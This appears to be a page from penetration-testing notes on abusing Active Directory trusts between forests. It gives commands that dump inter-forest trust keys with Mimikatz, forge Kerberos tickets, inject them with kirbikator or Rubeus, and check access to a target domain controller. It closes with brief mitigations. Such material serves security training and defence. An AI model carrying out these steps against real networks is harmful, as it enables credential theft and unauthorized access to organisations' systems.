Trust Abuse Between Forests

Traversing between forests is not too much different than traversing within a forest. The difference is that SID histories cannot be abused like they can when travelling within a forest because of SID filtering. We cannot escalate privileges to Enterprise Admins between forests like we can within a forest.

Therefore, the privilges we will have in the target forest are limited to the privileges the Domain Admins in our current domain would have in the external forest.

Using Inter-Forest Trust Tickets to Move Laterally

Step 1

  • To forge these tickets, we need the trust key for the inter-forest trusts. So we must find those first. This will require Admin privileges.

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName <dc>

Step 2

  • Now we can forge the Inter-Forest TGT (doesn't require Admin privileges)

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current_domain> /sid:<domain_SID> /rc4:<trust_key> /service:krbtgt /target:<target_forest> /ticket:C:\path\to\new\ticket.kirbi"'

Step 3

  • And then forge a TGS to the target forest

# asktgs.exe
asktgs.exe <trust_ticket.kirbi> <service>/<target_domain>
# example
asktgs.exe .\trust_ticket1.kirbi CIFS/targetDC.bizcorp.local

Step 4

  • Then we can inject the ticket created from the last step

# kirbikator.exe
kirbikator.exe lsa .\<service_ticket_to_parent.kirbi>

Step 5

  • Now check our access

# If CIFS...
ls \\target.DC\C$
# If WMI
Get-WmiObject Win32_Processor -ComputerName <target.dc>

Steps 3 and 4 Can Also Be Done with Rubeus.exe

.\Rubeus.exe asktgs /ticket:<TGT_trust_ticket.kirbi> /service:<service>/<target_DC> /dc:<target_DC> /ptt

Mitigations

  • Employ Selective Authentication so that users between trusts will not be automatically authenticated. Individual access to services between forests should be in use.

  • Although SID filtering is enabled by default, make sure it is place as long as it does not break any applications or disrupt user access. This way Enterprise Admin SID Histories cannot be used to forge inter-forest trust tickets (although Enterprise DC SIDs are exempt from filtering).

PreviousChild to Parent Movement Across TrustsNextMSSQL Server Trust Abuse

Last updated